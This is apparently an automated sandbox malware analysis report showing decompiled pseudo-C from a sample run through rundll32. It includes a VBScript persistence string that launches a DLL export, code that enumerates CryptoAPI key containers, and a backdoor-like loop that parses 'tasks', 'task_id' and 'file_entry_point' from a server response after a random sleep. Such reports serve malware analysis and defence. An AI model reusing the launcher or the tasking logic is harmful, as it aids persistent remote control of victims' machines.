                                        0x21ef2fe7762
                                        0x21ef2fe776e
                                        0x21ef2fe7775
                                        0x21ef2fe7789
                                        0x21ef2fe778f
                                        0x21ef2fe7793
                                        0x21ef2fe779e
                                        0x21ef2fe77a4
                                        0x21ef2fe77ac
                                        0x21ef2fe77b1
                                        0x21ef2fe77bc
                                        0x21ef2fe77c1
                                        0x21ef2fe77c3
                                        0x21ef2fe77c8
                                        0x21ef2fe77c9
                                        0x21ef2fe77d0
                                        0x21ef2fe77d2
                                        0x21ef2fe77d7
                                        0x21ef2fe77d8
                                        0x21ef2fe77df
                                        0x21ef2fe77e1
                                        0x21ef2fe77e6
                                        0x21ef2fe77eb
                                        0x21ef2fe77ed
                                        0x21ef2fe77f2
                                        0x21ef2fe77f6
                                        0x21ef2fe77fb
                                        0x21ef2fe7803
                                        0x21ef2fe7808
                                        0x21ef2fe7815
                                        0x21ef2fe7817
                                        0x21ef2fe781b
                                        0x21ef2fe7826
                                        0x21ef2fe7832
                                        0x21ef2fe7839
                                        0x21ef2fe7849
                                        0x21ef2fe784f
                                        0x21ef2fe7858
                                        0x21ef2fe785c
                                        0x21ef2fe7861
                                        0x21ef2fe7871
                                        0x21ef2fe7881
                                        0x21ef2fe7886
                                        0x21ef2fe7895
                                        0x21ef2fe78a5
                                        0x21ef2fe78b0
                                        0x21ef2fe78b5
                                        0x21ef2fe78c6
                                        0x21ef2fe78d0
                                        0x21ef2fe78dc
                                        0x21ef2fe78e1
                                        0x21ef2fe78e8
                                        0x21ef2fe78ea
                                        0x21ef2fe78f6
                                        0x21ef2fe78fb
                                        0x21ef2fe7907
                                        0x21ef2fe790d
                                        0x21ef2fe7912
                                        0x21ef2fe791b
                                        0x21ef2fe7923
                                        0x21ef2fe7932
                                        0x21ef2fe7937
                                        0x21ef2fe793c
                                        0x21ef2fe7944
                                        0x21ef2fe794c
                                        0x21ef2fe7954
                                        0x21ef2fe7954
                                        0x21ef2fe795f
                                        0x21ef2fe7965
                                        0x21ef2fe796f
                                        0x21ef2fe797c
                                        0x21ef2fe7982
                                        0x21ef2fe798a
                                        0x21ef2fe798c
                                        0x21ef2fe7996
                                        0x21ef2fe7998
                                        0x21ef2fe799e
                                        0x21ef2fe79a8
                                        0x21ef2fe79aa
                                        0x21ef2fe79ae
                                        0x21ef2fe79bb
                                        0x21ef2fe79c1
                                        0x21ef2fe79c7
                                        0x21ef2fe79ce
                                        0x21ef2fe79d0
                                        0x21ef2fe79da
                                        0x21ef2fe79e3
                                        0x21ef2fe79e9
                                        0x21ef2fe79f0
                                        0x21ef2fe79f9
                                        0x21ef2fe7a01
                                        0x21ef2fe7a10
                                        0x21ef2fe7a15
                                        0x21ef2fe7a1b
                                        0x21ef2fe7a22
                                        0x21ef2fe7a2c
                                        0x21ef2fe7a31
                                        0x21ef2fe7a40
                                        0x21ef2fe7a4f
                                        0x21ef2fe7a60
                                        0x21ef2fe7a6d
                                        0x21ef2fe7a82
                                        0x21ef2fe7a87
                                        0x21ef2fe7a8b
                                        0x21ef2fe7a8f
                                        0x21ef2fe7a97
                                        0x21ef2fe7a9b
                                        0x21ef2fe7a9f
                                        0x21ef2fe7ab0
                                        0x21ef2fe7ab6
                                        0x21ef2fe7aba
                                        0x21ef2fe7abe
                                        0x21ef2fe7ac6
                                        0x21ef2fe7aca
                                        0x21ef2fe7ace
                                        0x21ef2fe7adf
                                        0x21ef2fe7aee
                                        0x21ef2fe7af7
                                        0x21ef2fe7afe
                                        0x21ef2fe7b0a
                                        0x21ef2fe7b10
                                        0x21ef2fe7b19
                                        0x21ef2fe7b2d
                                        0x21ef2fe7b3b
                                        0x21ef2fe7b4c
                                        0x21ef2fe7b58
                                        0x21ef2fe7b5e
                                        0x21ef2fe7b6c
                                        0x21ef2fe7b7a
                                        0x21ef2fe7b7f
                                        0x21ef2fe7b83
                                        0x21ef2fe7b88
                                        0x21ef2fe7b8d
                                        0x21ef2fe7b91
                                        0x21ef2fe7b99
                                        0x21ef2fe7b9e
                                        0x21ef2fe7ba4
                                        0x21ef2fe7bb6
                                        0x21ef2fe7bc5
                                        0x21ef2fe7bcf
                                        0x21ef2fe7bd8
                                        0x21ef2fe7be6
                                        0x21ef2fe7bf5
                                        0x21ef2fe7bfa
                                        0x21ef2fe7c02
                                        0x21ef2fe7c07
                                        0x21ef2fe7c33
                                        0x21ef2fe7c42
                                        0x21ef2fe7c44
                                        0x21ef2fe7c4a
                                        0x21ef2fe7c5a
                                        0x21ef2fe7c5f
                                        0x21ef2fe7c77
                                        0x21ef2fe7c7c
                                        0x21ef2fe7c87
                                        0x21ef2fe7c8d
                                        0x21ef2fe7c96
                                        0x21ef2fe7c9b
                                        0x21ef2fe7ca6
                                        0x21ef2fe7cab
                                        0x21ef2fe7cad
                                        0x21ef2fe7cb2
                                        0x21ef2fe7cb3
                                        0x21ef2fe7cba
                                        0x21ef2fe7cbc
                                        0x21ef2fe7cc1
                                        0x21ef2fe7cc2
                                        0x21ef2fe7cc9
                                        0x21ef2fe7ccb
                                        0x21ef2fe7cd0
                                        0x21ef2fe7cd5
                                        0x21ef2fe7cd7
                                        0x21ef2fe7cdc
                                        0x21ef2fe7ce0
                                        0x21ef2fe7ce5
                                        0x21ef2fe7cee
                                        0x21ef2fe7cf3
                                        0x21ef2fe7cfc
                                        0x21ef2fe7d23

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FolderPathSpecial
                                        • String ID: .dll$Set objShell = CreateObject("Wscript.Shell")objShell.Run "rundll32.exe my_application_path, shjKeAQfgT"$my_application_path$wscript.exe$wscript.exe
                                        • API String ID: 994120019-3429855562
                                        • Opcode ID: 9c5ffe9080db362095deada25c1d1be3e442dddafeae94c1de231125c311795f
                                        • Instruction ID: bd9435a8616a62c5cf0528e04c8846444c97aa0ccfd3911b6d6a053efc7d431e
                                        • Opcode Fuzzy Hash: 9c5ffe9080db362095deada25c1d1be3e442dddafeae94c1de231125c311795f
                                        • Instruction Fuzzy Hash: 6D129A32620A4585FF11DB64DC487DE27B1E765798F520215EE5A23FEADF38C586C380
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF302FCB0 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 222encryptionCOMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 21%
                                        			E0000021E21EF302FCB0(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r9, long long __r12) {
				void* __rbp;
				int _t50;
				signed int _t74;
				int _t101;
				signed long long _t134;
				signed long long _t135;
				int _t139;
				char* _t158;
				void* _t169;
				signed long long _t171;
				void* _t172;
				void* _t173;
				void* _t174;

				E0000021E21EF310C220();
				_t173 = _t172 - __rax;
				_t171 = _t173 + 0x30;
				 *((long long*)(_t171 + 0x40)) = __rbx;
				 *((long long*)(_t171 + 0x48)) = __rsi;
				 *((long long*)(_t171 + 0x50)) = __rdi;
				 *((long long*)(_t171 + 0x58)) = __r12;
				_t134 =  *0xf3203000; // 0x1fc8e4a4378e
				_t135 = _t134 ^ _t171;
				 *(_t171 + 0x10) = _t135;
				r9d =  *(__rcx + 0x20);
				_t158 = "Listing containers CSP=%s, type = %d\n";
				_t169 = __rcx;
				 *_t171 = 0;
				r15d = 1;
				E0000021E21EF302D790(_t135, _t158,  *((intOrPtr*)(__rcx + 0x18)), __r9);
				if ( *((intOrPtr*)(__rcx + 0x18)) == 0) goto 0xf302fdc8;
				 *((intOrPtr*)(_t173 + 0x28)) = 0;
				r9d = r9d | 0xffffffff;
				 *((long long*)(_t173 + 0x20)) = __rbx;
				_t50 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				_t101 = _t50;
				 *(_t171 + 4) = _t101;
				if (_t50 == 0) goto 0xf302fd88;
				_t13 = _t135 + _t135 + 0xf; // 0xf
				if (_t13 - _t135 + _t135 > 0) goto 0xf302fd54;
				E0000021E21EF310C220();
				_t174 = _t173 - 0xffffffffffffff0;
				r9d = r9d | 0xffffffff;
				 *(_t174 + 0x28) = _t101;
				_t139 = _t174 + 0x30;
				 *(_t174 + 0x20) = _t139;
				MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (_t139 != 0) goto 0xf302fdc8;
				if ( *0xf3209020 != 0) goto 0xf302fd9d;
				 *0xf3209020 = E0000021E21EF3021CE0(0xfffffff0);
				 *(_t174 + 0x20) = 0x4ad;
				_t19 = _t158 - 0x2a; // 0x41
				r8d = _t19;
				E0000021E21EF30222D0(_t54, 0x6b,  *0xf3209020, 0xfffffff0, _t139, 0xffffffffffffff0, _t158, _t169, _t171, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				E0000021E21EF302DA10( *0xf3209020, 0xfffffff0, _t158);
				goto 0xf3030007;
				r9d =  *(_t169 + 0x20);
				 *(_t174 + 0x20) = 0xf0000000;
				__imp__CryptAcquireContextW();
				if (0 != 0) goto 0xf302fe27;
				if ( *0xf3209020 != 0) goto 0xf302fdfc;
				 *0xf3209020 = E0000021E21EF3021CE0(0xfffffff0);
				 *(_t174 + 0x20) = 0x4b5;
				_t24 = _t158 - 4; // 0x67
				r8d = _t24;
				E0000021E21EF30222D0(_t59, 0x6b,  *0xf3209020, 0xfffffff0, _t139, _t171 + 8, _t158, _t169, _t171, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				E0000021E21EF302DA10( *0xf3209020, 0xfffffff0, _t158);
				goto 0xf3030007;
				r8d = 0;
				 *(_t174 + 0x20) = r15d;
				__imp__CryptGetProvParam();
				if (0 != 0) goto 0xf302fe90;
				if ( *0xf3209020 != 0) goto 0xf302fe5a;
				 *0xf3209020 = E0000021E21EF3021CE0(0xfffffff0);
				 *(_t174 + 0x20) = 0x4bb;
				r8d = 0x6b;
				E0000021E21EF30222D0(_t64, 0x6b,  *0xf3209020, 0xfffffff0, _t139,  *((intOrPtr*)(_t171 + 8)), _t158, _t169, _t171, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				E0000021E21EF302DA10( *0xf3209020, 0xfffffff0, _t158);
				__imp__CryptReleaseContext();
				goto 0xf3030007;
				r8d =  *_t171;
				E0000021E21EF302D790(0xfffffff0, "Got max container len %d\n", _t139, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				_t160 = "..\\..\\openssl-1.1.0f\\engines\\e_capi.c";
				r8d = 0x4c3;
				_t70 =  ==  ? 0x400 :  *_t171;
				 *_t171 =  ==  ? 0x400 :  *_t171;
				E0000021E21EF3025700();
				if (0xfffffff0 != 0) goto 0xf302ff08;
				if ( *0xf3209020 != 0) goto 0xf302fee4;
				 *0xf3209020 = E0000021E21EF3021CE0(0xfffffff0);
				 *(_t174 + 0x20) = 0x4c5;
				_t31 = _t160 - 0x2a; // 0x41
				r8d = _t31;
				E0000021E21EF30222D0(_t72, 0x6b,  *0xf3209020, 0xfffffff0, _t139, _t169, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c", _t169, _t171, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				goto 0xf302ffe0;
				asm("o16 nop [eax+eax]");
				_t74 =  *_t171;
				r14d = 0;
				 *(_t171 + 4) = _t74;
				 *0xfffffff0 = 0;
				r14b = 0 == 0;
				 *(_t174 + 0x20) = r14d;
				__imp__CryptGetProvParam();
				if (_t74 == 0) goto 0xf302ff97;
				r9d =  *(_t171 + 4);
				 *(_t174 + 0x28) = r14d;
				 *(_t174 + 0x20) = 0;
				E0000021E21EF302D790(0xfffffff0, "Container name %s, len=%d, index=%d, flags=%d\n", 0xfffffff0, _t171 + 4);
				if ( *0xfffffff0 != 0) goto 0xf302ff6d;
				if ( *(_t171 + 4) ==  *_t171) goto 0xf302ff86;
				r8d = 0;
				E0000021E21EF30263F0(0xfffffff0, "%lu. %s\n", 0xfffffff0, 0xfffffff0);
				goto 0xf302ff10;
				E0000021E21EF302D790(0xfffffff0, "Enumerate bug: using workaround\n", 0xfffffff0, 0xfffffff0);
				goto 0xf302ffe3;
				if (GetLastError() == 0x103) goto 0xf302ffe3;
				if ( *0xf3209020 != 0) goto 0xf302ffbb;
				 *0xf3209020 = E0000021E21EF3021CE0(0xfffffff0);
				 *(_t174 + 0x20) = 0x4d6;
				r8d = 0x6b;
				E0000021E21EF30222D0(_t81, 0x6b,  *0xf3209020, 0xfffffff0, _t139, _t169, "Enumerate bug: using workaround\n", _t169, _t171, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				E0000021E21EF302D9B0(_t79,  *0xf3209020, 0xfffffff0, "Enumerate bug: using workaround\n");
				r15d = 0;
				r8d = 0x4e7;
				E0000021E21EF3025750();
				__imp__CryptReleaseContext();
				E0000021E21EF310C290();
				return r15d;
			}
















                                        0x21ef302fcbb
                                        0x21ef302fcc0
                                        0x21ef302fcc3
                                        0x21ef302fcc8
                                        0x21ef302fccc
                                        0x21ef302fcd0
                                        0x21ef302fcd4
                                        0x21ef302fcd8
                                        0x21ef302fcdf
                                        0x21ef302fce2
                                        0x21ef302fce6
                                        0x21ef302fcf1
                                        0x21ef302fcf8
                                        0x21ef302fcfb
                                        0x21ef302fd02
                                        0x21ef302fd0a
                                        0x21ef302fd16
                                        0x21ef302fd1c
                                        0x21ef302fd20
                                        0x21ef302fd26
                                        0x21ef302fd2d
                                        0x21ef302fd33
                                        0x21ef302fd35
                                        0x21ef302fd3a
                                        0x21ef302fd41
                                        0x21ef302fd48
                                        0x21ef302fd5b
                                        0x21ef302fd64
                                        0x21ef302fd67
                                        0x21ef302fd6d
                                        0x21ef302fd71
                                        0x21ef302fd78
                                        0x21ef302fd7d
                                        0x21ef302fd86
                                        0x21ef302fd90
                                        0x21ef302fd97
                                        0x21ef302fda2
                                        0x21ef302fdb3
                                        0x21ef302fdb3
                                        0x21ef302fdb7
                                        0x21ef302fdbc
                                        0x21ef302fdc3
                                        0x21ef302fdc8
                                        0x21ef302fdd3
                                        0x21ef302fddd
                                        0x21ef302fde5
                                        0x21ef302fdef
                                        0x21ef302fdf6
                                        0x21ef302fe01
                                        0x21ef302fe12
                                        0x21ef302fe12
                                        0x21ef302fe16
                                        0x21ef302fe1b
                                        0x21ef302fe22
                                        0x21ef302fe2f
                                        0x21ef302fe32
                                        0x21ef302fe3b
                                        0x21ef302fe43
                                        0x21ef302fe4d
                                        0x21ef302fe54
                                        0x21ef302fe5f
                                        0x21ef302fe67
                                        0x21ef302fe73
                                        0x21ef302fe78
                                        0x21ef302fe83
                                        0x21ef302fe8b
                                        0x21ef302fe90
                                        0x21ef302fe9e
                                        0x21ef302fea6
                                        0x21ef302feb4
                                        0x21ef302feba
                                        0x21ef302febf
                                        0x21ef302fec2
                                        0x21ef302fecd
                                        0x21ef302fed7
                                        0x21ef302fede
                                        0x21ef302fee9
                                        0x21ef302fefa
                                        0x21ef302fefa
                                        0x21ef302fefe
                                        0x21ef302ff03
                                        0x21ef302ff0a
                                        0x21ef302ff10
                                        0x21ef302ff17
                                        0x21ef302ff1a
                                        0x21ef302ff1d
                                        0x21ef302ff29
                                        0x21ef302ff32
                                        0x21ef302ff37
                                        0x21ef302ff3f
                                        0x21ef302ff41
                                        0x21ef302ff4c
                                        0x21ef302ff57
                                        0x21ef302ff5b
                                        0x21ef302ff63
                                        0x21ef302ff6b
                                        0x21ef302ff77
                                        0x21ef302ff7d
                                        0x21ef302ff84
                                        0x21ef302ff90
                                        0x21ef302ff95
                                        0x21ef302ffa4
                                        0x21ef302ffae
                                        0x21ef302ffb5
                                        0x21ef302ffc0
                                        0x21ef302ffc8
                                        0x21ef302ffd4
                                        0x21ef302ffdb
                                        0x21ef302ffe0
                                        0x21ef302ffe3
                                        0x21ef302fff3
                                        0x21ef302fffe
                                        0x21ef303000e
                                        0x21ef303002c

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$Context$ByteCharMultiParamProvReleaseWide$AcquireErrorLast
                                        • String ID: %lu. %s$..\..\openssl-1.1.0f\engines\e_capi.c$Container name %s, len=%d, index=%d, flags=%d$Enumerate bug: using workaround$Got max container len %d$Listing containers CSP=%s, type = %d
                                        • API String ID: 1510837364-3467115363
                                        • Opcode ID: 6244d7be364c79efb0dd520c24c75eb8c735fcfb8e94519efcaaf579a275546e
                                        • Instruction ID: 9ae390343397b1a59f587f5d28b9be190767789e978db40ce672bbd856f03b73
                                        • Opcode Fuzzy Hash: 6244d7be364c79efb0dd520c24c75eb8c735fcfb8e94519efcaaf579a275546e
                                        • Instruction Fuzzy Hash: A0A15B76300A409AFF609F65DC487DB37A1F769B98F528126EE0A87E99DB3CC506C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FE990A Relevance: 23.3, APIs: 9, Strings: 4, Instructions: 502sleepCOMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 19%
                                        			E0000021E21EF2FE990A() {
				void* _t365;
				signed int _t398;
				void* _t401;
				void* _t403;
				void* _t423;
				signed int _t440;
				void* _t445;
				void* _t449;
				signed char _t488;
				signed char _t490;
				signed char _t497;
				signed char _t501;
				void* _t531;
				void* _t535;
				signed long long* _t657;
				intOrPtr _t658;
				intOrPtr _t660;
				intOrPtr _t661;
				intOrPtr _t663;
				signed long long _t665;
				signed long long _t668;
				signed long long _t670;
				signed long long _t673;
				signed int* _t677;
				signed long long _t679;
				signed long long _t682;
				signed long long _t684;
				signed long long _t686;
				signed long long _t689;
				signed long long _t691;
				signed long long _t693;
				signed long long _t696;
				signed long long _t698;
				signed long long _t701;
				signed long long _t703;
				intOrPtr _t709;
				intOrPtr _t711;
				intOrPtr _t712;
				long long _t714;
				intOrPtr _t715;
				intOrPtr _t717;
				intOrPtr _t718;
				intOrPtr _t720;
				intOrPtr _t721;
				intOrPtr _t723;
				void* _t726;
				signed long long _t727;
				signed long long _t728;
				signed long long _t730;
				signed long long _t732;
				signed long long _t734;
				signed long long _t736;
				signed long long _t738;
				void* _t740;
				intOrPtr _t744;
				intOrPtr _t752;
				void* _t753;
				intOrPtr _t755;
				void* _t756;
				intOrPtr _t802;
				void* _t803;
				intOrPtr _t805;
				void* _t806;
				intOrPtr _t829;
				void* _t830;
				intOrPtr _t840;
				void* _t841;
				intOrPtr _t843;
				void* _t844;
				void* _t861;
				void* _t922;
				signed long long _t923;
				intOrPtr _t925;
				void* _t926;
				void* _t927;
				signed long long _t928;
				signed long long _t932;
				intOrPtr _t934;
				long long* _t935;
				void* _t936;
				signed long long _t939;
				signed long long _t942;
				signed long long _t946;
				void* _t966;
				void* _t974;
				signed long long _t977;
				signed long long _t978;
				signed long long _t979;
				signed long long _t980;
				signed long long _t981;
				signed long long _t983;

				_t863 =  >=  ?  *((void*)(_t935 + 0x50)) : _t935 + 0x50;
				r8d =  *(_t935 + 0x60);
				E0000021E21EF2FE1080(_t935 + 0x480,  >=  ?  *((void*)(_t935 + 0x50)) : _t935 + 0x50);
				_t865 =  >=  ?  *((void*)(_t936 + 0x70)) : _t936 + 0x70;
				r8d =  *(_t935 - 0x80);
				E0000021E21EF2FE1290(E0000021E21EF2FE1400( *((long long*)(_t935 - 0x78)) - 0x10, _t935 + 0x480,  >=  ?  *((void*)(_t936 + 0x70)) : _t936 + 0x70), _t935 + 0x480);
				 *(_t935 + 0xc0) = _t657;
				 *(_t935 + 0xc8) = _t657;
				 *((intOrPtr*)(_t935 + 0xce)) = r15w;
				asm("xorps xmm0, xmm0");
				asm("movdqa [ebp+0xd0], xmm0");
				asm("xorps xmm1, xmm1");
				asm("movdqa [ebp+0xe0], xmm1");
				asm("movdqa [ebp+0xf0], xmm0");
				 *(_t935 + 0x100) = _t981;
				 *((long long*)(_t935 + 0x108)) = 0x400;
				 *(_t935 + 0x110) = r15d;
				 *(_t935 + 0x118) = _t981;
				if ( *(_t935 + 0xd0) != _t657) goto 0xf2fe99e9;
				E0000021E21EF310B674(_t657, _t935 + 0x480);
				 *(_t935 + 0x330) = _t657;
				 *_t657 = _t981;
				_t657[1] = 0x10000;
				_t657[2] = _t981;
				_t657[3] = _t981;
				_t657[4] = _t981;
				 *(_t935 + 0xd0) = _t657;
				 *(_t935 + 0xd8) = _t657;
				_t867 =  >=  ?  *((void*)(_t936 + 0x70)) : _t936 + 0x70;
				_t31 = _t935 + 0xc0; // 0xc3
				E0000021E21EF2FEBB60(_t726, _t31,  >=  ?  *((void*)(_t936 + 0x70)) : _t936 + 0x70, _t927);
				if (_t657[0xa] == 0) goto 0xf2fe9b18;
				r8d = E0000021E21EF3111C60(_t657);
				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
				r8d = r8d + 0x19;
				_t488 = r8d * 0x3e8;
				Sleep(??);
				if ( *(_t935 + 0xd8) == 0) goto 0xf2fe9a4f;
				_t365 = E0000021E21EF2FEB260(0x28c1979 * r8d, _t726,  *(_t935 + 0xd8));
				0xf3111fb0();
				0xf310bdc8();
				_t658 =  *((intOrPtr*)(_t935 - 0x78));
				if (_t658 - 0x10 < 0) goto 0xf2fe9ab7;
				_t752 =  *((intOrPtr*)(_t936 + 0x70));
				if (_t658 + 1 - _t922 < 0) goto 0xf2fe9ab2;
				if ((_t488 & 0x0000001f) != 0) goto 0xf2fea88f;
				_t660 =  *((intOrPtr*)(_t752 - 8));
				if (_t660 - _t752 >= 0) goto 0xf2fea889;
				_t753 = _t752 - _t660;
				if (_t753 - 8 < 0) goto 0xf2fea883;
				if (_t753 - 0x27 > 0) goto 0xf2fea87d;
				0xf310ba8c();
				 *((long long*)(_t935 - 0x78)) = 0xf;
				 *(_t935 - 0x80) = _t981;
				 *((char*)(_t936 + 0x70)) = 0;
				_t661 =  *((intOrPtr*)(_t935 - 0x38));
				if (_t661 - 0x10 < 0) goto 0xf2fe98ee;
				_t755 =  *((intOrPtr*)(_t935 - 0x50));
				if (_t661 + 1 - _t922 < 0) goto 0xf2fe98e9;
				if ((_t488 & 0x0000001f) != 0) goto 0xf2fea8a7;
				_t663 =  *((intOrPtr*)(_t755 - 8));
				if (_t663 - _t755 >= 0) goto 0xf2fea8a1;
				_t756 = _t755 - _t663;
				if (_t756 - 8 < 0) goto 0xf2fea89b;
				if (_t756 - 0x27 > 0) goto 0xf2fea895;
				goto 0xf2fe98e6;
				_t923 =  *((intOrPtr*)(_t935 - 0x30));
				_t727 = _t923;
				 *(_t935 + 8) = _t727;
				_t928 =  *(_t935 - 0x28);
				if (_t923 == _t928) goto 0xf2fe9b59;
				E0000021E21EF2FE6100(E0000021E21EF2FE6100(E0000021E21EF2FE6100(_t365, _t488, _t727 + 0x48), _t488, _t727 + 0x28), _t488, _t727);
				_t728 = _t727 + 0x70;
				 *(_t935 + 8) = _t728;
				if (_t728 != _t928) goto 0xf2fe9b30;
				_t977 = _t923;
				 *(_t935 - 0x28) = _t923;
				if ( *((short*)(_t935 + 0xce)) != 3) goto 0xf2fea70b;
				_t665 =  *(_t935 + 0xc8) & 0xffffffff;
				_t730 = (_t728 << 5) + _t665;
				_t63 = _t935 + 0x338; // 0x33b
				_t64 = _t935 + 0xc0; // 0xc3
				E0000021E21EF2FEB470(_t531, _t730, _t64, _t63, 0xffffffff, _t935, "response_status");
				if ( *_t665 == _t730) goto 0xf2fe9c02;
				 *(_t935 + 0x40) = _t665;
				 *(_t935 + 0x48) = _t665;
				 *((short*)(_t935 + 0x4e)) = 0x405;
				_t668 =  *(_t935 + 0x48) & 0x00000000 | "response_status";
				 *(_t935 + 0x48) = _t668;
				 *(_t935 + 0x40) = 0xf;
				E0000021E21EF2FEBA50(_t935 + 0xc0, _t935 + 0x40, _t923, 0xffffffff, _t935, _t977, _t981);
				r12d =  *_t668;
				 *((intOrPtr*)(_t935 + 0x5e0)) = r12d;
				_t670 =  *(_t935 + 0xc8) & 0xffffffff;
				_t732 = (_t730 << 5) + _t670;
				_t76 = _t935 + 0x340; // 0x343
				_t77 = _t935 + 0xc0; // 0xc3
				E0000021E21EF2FEB470(_t531, _t732, _t77, _t76, 0xffffffff, _t935, "tasks");
				if ( *_t670 == _t732) goto 0xf2fea155;
				 *(_t935 + 0x30) = _t670;
				 *(_t935 + 0x38) = _t670;
				 *((short*)(_t935 + 0x3e)) = 0x405;
				_t673 =  *(_t935 + 0x38) & 0x00000000 | "tasks";
				 *(_t935 + 0x38) = _t673;
				 *(_t935 + 0x30) = 5;
				E0000021E21EF2FEBA50(_t935 + 0xc0, _t935 + 0x30, _t923, 0, _t935, _t977, _t981);
				if ( *((short*)(_t673 + 0xe)) != 4) goto 0xf2fea155;
				 *(_t935 + 0x70) = _t673;
				 *(_t935 + 0x78) = _t673;
				 *((short*)(_t935 + 0x7e)) = 0x405;
				 *(_t935 + 0x78) =  *(_t935 + 0x78) & 0x00000000 | "tasks";
				 *(_t935 + 0x70) = 5;
				E0000021E21EF2FEB090(E0000021E21EF2FEBA50(_t935 + 0xc0, _t935 + 0x70, _t923, 0, _t935, _t977, _t981),  *(_t935 + 0x78) & 0x00000000 | "tasks", _t935 + 0x1c8);
				_t677 =  *((intOrPtr*)(_t935 + 0x1c8));
				_t932 = _t677[2] & 0xffffffff;
				r15d =  *_t677;
				_t983 = (_t981 << 4) + _t932;
				if (_t932 == _t983) goto 0xf2fea152;
				r12d = 0x1000;
				 *(_t935 + 0x250) = _t677;
				 *(_t935 + 0x258) = _t677;
				 *(_t935 + 0x258) = 0xf;
				 *(_t935 + 0x250) = _t677;
				 *((char*)(_t935 + 0x240)) = 0;
				 *(_t935 + 0x278) = _t677;
				 *(_t935 + 0x280) = _t677;
				 *(_t935 + 0x280) = 0xf;
				 *(_t935 + 0x278) = _t677;
				 *((char*)(_t935 + 0x268)) = 0;
				 *(_t935 + 0x298) = _t677;
				 *(_t935 + 0x2a0) = _t677;
				 *(_t935 + 0x2a0) = 0xf;
				 *(_t935 + 0x298) = _t677;
				 *((char*)(_t935 + 0x288)) = 0;
				if ( *((short*)(_t932 + 0xe)) != 3) goto 0xf2fea112;
				_t679 =  *(_t932 + 8) & 0xffffffff;
				_t734 = (_t732 << 5) + _t679;
				_t939 = "task_data";
				E0000021E21EF2FEB470(_t531, _t734, _t932, _t935 + 0x360, _t932, _t935, _t939);
				if ( *_t679 == _t734) goto 0xf2fe9e4e;
				 *(_t935 + 0x80) = _t679;
				 *(_t935 + 0x88) = _t679;
				 *((short*)(_t935 + 0x8e)) = 0x405;
				_t682 =  *(_t935 + 0x88) & 0x00000000 | "task_data";
				 *(_t935 + 0x88) = _t682;
				 *(_t935 + 0x80) = 9;
				E0000021E21EF2FEBA50(_t932, _t935 + 0x80, _t923, _t932, _t935, _t977, _t983);
				if (( *(_t682 + 0xe) & r12w) != 0) goto 0xf2fe9e27;
				_t684 =  *(_t682 + 8) & 0xffffffff;
				if ( *_t684 != 0) goto 0xf2fe9e31;
				r8d = 0;
				goto 0xf2fe9e3f;
				if ( *((char*)(_t684 + (_t939 | 0xffffffff) + 1)) != 0) goto 0xf2fe9e35;
				E0000021E21EF2FE6400(_t734, _t935 + 0x268, _t684, _t932, (_t939 | 0xffffffff) + 1);
				_t686 =  *(_t932 + 8) & 0xffffffff;
				_t736 = (_t734 << 5) + _t686;
				_t942 = "task";
				E0000021E21EF2FEB470(_t531, _t736, _t932, _t935 + 0x348, _t932, _t935, _t942);
				if ( *_t686 == _t736) goto 0xf2fe9f0d;
				 *(_t935 + 0x90) = _t686;
				 *(_t935 + 0x98) = _t686;
				 *((short*)(_t935 + 0x9e)) = 0x405;
				_t689 =  *(_t935 + 0x98) & 0x00000000 | "task";
				 *(_t935 + 0x98) = _t689;
				 *(_t935 + 0x90) = 4;
				E0000021E21EF2FEBA50(_t932, _t935 + 0x90, _t923, _t932, _t935, _t977, _t983);
				if (( *(_t689 + 0xe) & r12w) != 0) goto 0xf2fe9ee6;
				_t691 =  *(_t689 + 8) & 0xffffffff;
				if ( *_t691 != 0) goto 0xf2fe9ef0;
				r8d = 0;
				goto 0xf2fe9efe;
				if ( *((char*)(_t691 + (_t942 | 0xffffffff) + 1)) != 0) goto 0xf2fe9ef4;
				E0000021E21EF2FE6400(_t736, _t935 + 0x240, _t691, _t932, (_t942 | 0xffffffff) + 1);
				_t693 =  *(_t932 + 8) & 0xffffffff;
				_t738 = (_t736 << 5) + _t693;
				E0000021E21EF2FEB470(_t531, _t738, _t932, _t935 + 0x350, _t932, _t935, "task_id");
				if ( *_t693 == _t738) goto 0xf2fe9f9b;
				 *(_t935 + 0xa0) = _t693;
				 *(_t935 + 0xa8) = _t693;
				 *((short*)(_t935 + 0xae)) = 0x405;
				_t696 =  *(_t935 + 0xa8) & 0x00000000 | "task_id";
				 *(_t935 + 0xa8) = _t696;
				 *(_t935 + 0xa0) = 7;
				E0000021E21EF2FEBA50(_t932, _t935 + 0xa0, _t923, _t932, _t935, _t977, _t983);
				 *((intOrPtr*)(_t935 + 0x260)) =  *_t696;
				_t698 =  *(_t932 + 8) & 0xffffffff;
				_t740 = (_t738 << 5) + _t698;
				_t946 = "file_entry_point";
				E0000021E21EF2FEB470(_t531, _t740, _t932, _t935 + 0x358, _t932, _t935, _t946);
				if ( *_t698 == _t740) goto 0xf2fea05a;
				 *(_t935 + 0xb0) = _t698;
